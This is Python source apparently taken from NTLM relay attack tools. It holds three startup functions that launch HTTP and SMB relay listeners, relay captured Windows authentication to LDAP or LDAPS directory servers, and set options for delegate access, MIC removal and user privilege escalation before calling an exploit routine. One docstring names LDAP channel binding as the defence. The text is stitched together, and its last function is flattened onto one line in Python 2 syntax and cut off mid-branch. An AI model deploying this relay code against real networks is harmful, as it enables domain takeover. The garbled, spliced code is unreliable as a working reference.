def start_servers(options, threads):
    """Configure and start the HTTP relay listener described by *options*.

    One ``NTLMRelayxConfig`` is built per server class in the local list
    (currently only ``HTTPRelayServer``), filled from the parsed command-line
    options, and handed to the server, which is started and registered in
    *threads*.

    Args:
        options: Parsed arguments. The attributes read here are ``e``, ``c``,
            ``enum_local_admins``, ``lootdir``, ``output_file``,
            ``interactive``, ``upload``, ``ipv6``, ``wpad_host``,
            ``wpad_auth_num``, ``smb2support``, ``interface_ip``,
            ``remove_mic``, ``remove_target`` and ``http_port``.
        threads: Collection with an ``add()`` method that receives every
            started server object.

    Returns:
        The config object of the last server started.
    """
    server_classes = [HTTPRelayServer]
    for server_cls in server_classes:
        # A fresh config per listener.
        config = NTLMRelayxConfig()
        config.setProtocolClients(PROTOCOL_CLIENTS)
        config.setExeFile(options.e)
        config.setCommand(options.c)
        config.setEnumLocalAdmins(options.enum_local_admins)
        # `codec` and `mode` are not defined in this function; they are
        # resolved from an enclosing scope that is not shown here.
        config.setEncoding(codec)
        config.setMode(mode)
        config.setAttacks(PROTOCOL_ATTACKS)
        config.setLootdir(options.lootdir)
        config.setOutputFile(options.output_file)
        config.setInteractive(options.interactive)
        config.setGPotatoStartUp(options.upload)
        config.setIPv6(options.ipv6)
        config.setWpadOptions(options.wpad_host, options.wpad_auth_num)
        config.setSMB2Support(options.smb2support)
        # Listener address and port come straight from the command line.
        config.setInterfaceIp(options.interface_ip)
        config.setExploitOptions(options.remove_mic, options.remove_target)
        config.setListeningPort(options.http_port)

        listener = server_cls(config)
        listener.start()
        threads.add(listener)
    return config
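def startServers(passargs):
    """Start an SMB relay listener aimed at an LDAPS target and run the exploit.

    Builds one ``NTLMRelayxConfig`` whose single target is
    ``ldaps://<passargs.ldaps>``, starts an ``SMBRelayServer`` with it, then
    calls ``exploit(passargs)``. When that returns a truthy status,
    ``checkauth(passargs)`` runs in a daemon thread and this function waits
    until the thread ends or Ctrl-C is pressed. The listener is shut down on
    every exit path.

    Args:
        passargs: Parsed arguments. Only ``passargs.ldaps`` is read here; the
            whole object is passed on to ``exploit`` and ``checkauth``.

    NOTE(review): relaying NTLM to an ``ldaps://`` target is the scenario that
    enforced LDAP channel binding on the directory server is meant to stop;
    that setting is the control to verify when assessing exposure.
    """
    ldaps_server = passargs.ldaps
    PoppedDB = Manager().dict()  # A dict of PoppedUsers
    PoppedDB_Lock = Lock()  # A lock for opening the dict

    c = NTLMRelayxConfig()
    c.setProtocolClients(PROTOCOL_CLIENTS)
    c.setTargets(
        TargetsProcessor(singleTarget=str("ldaps://" + ldaps_server),
                         protocolClients=PROTOCOL_CLIENTS))
    c.setOutputFile(None)
    c.setEncoding('ascii')
    c.setMode('RELAY')
    c.setAttacks(PROTOCOL_ATTACKS)
    c.setLootdir('.')
    # Hard-coded wildcard address: presumably the listener accepts
    # connections on every interface of the host, not only the one facing
    # the test network -- confirm against SMBRelayServer.
    c.setInterfaceIp("0.0.0.0")
    # NOTE(review): what the single positional True enables is defined by
    # NTLMRelayxConfig.setExploitOptions -- confirm against that class.
    c.setExploitOptions(True)
    c.setSMB2Support(True)
    c.delegateaccess = True
    c.PoppedDB = PoppedDB  # pass the poppedDB to the relay servers
    c.PoppedDB_Lock = PoppedDB_Lock  # pass the lock to the relay servers

    s = SMBRelayServer(c)
    s.start()
    logging.info("Relay servers started, waiting for connection....")
    try:
        status = exploit(passargs)
        if status:
            exp = Thread(target=checkauth, args=(passargs, ))
            exp.daemon = True
            exp.start()
            try:
                # Thread.isAlive() was removed in Python 3.9; is_alive() is
                # the portable spelling. join() with a timeout replaces the
                # original `pass` spin loop, so the wait no longer pins a CPU
                # core while still reacting to Ctrl-C.
                while exp.is_alive():
                    exp.join(0.5)
            except KeyboardInterrupt:
                # Ctrl-C only ends the wait; the finally clause below stops
                # the listener.
                pass
        else:
            logging.error("Error in exploit, Shutting down...")
    except Exception as e:
        print(e)
        logging.error("Error in exploit, Shutting down...")
    finally:
        # Single shutdown point, so the listener is stopped exactly once
        # whichever branch above was taken (including an interrupt raised
        # while exploit() is running).
        logging.info("Shutting down...")
        s.server.shutdown()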
def startServers(passargs): targetSystem = passargs.target_host privuser = passargs.user PoppedDB = Manager().dict() # A dict of PoppedUsers PoppedDB_Lock = Lock() # A lock for opening the dict relayServers = [HTTPRelayServer, SMBRelayServer] serverThreads = [] for server in relayServers: c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setTargets( TargetsProcessor(singleTarget=str("ldap://" + targetSystem), protocolClients=PROTOCOL_CLIENTS)) c.setOutputFile(None) c.setEncoding('ascii') c.setMode('RELAY') c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir('.') c.setInterfaceIp("0.0.0.0") c.setExploitOptions(True) c.escalateuser = privuser c.setSMB2Support(True) c.PoppedDB = PoppedDB # pass the poppedDB to the relay servers c.PoppedDB_Lock = PoppedDB_Lock # pass the poppedDB to the relay servers s = server(c) s.start() serverThreads.append(s) logging.info("Relay servers started, waiting for connection....") try: status = exploit(passargs) if status: exp = Thread(target=checkauth, args=(passargs, )) exp.daemon = True exp.start() try: while exp.isAlive(): pass except KeyboardInterrupt, e: logging.info("Shutting down...") for thread in serverThreads: thread.server.shutdown() else: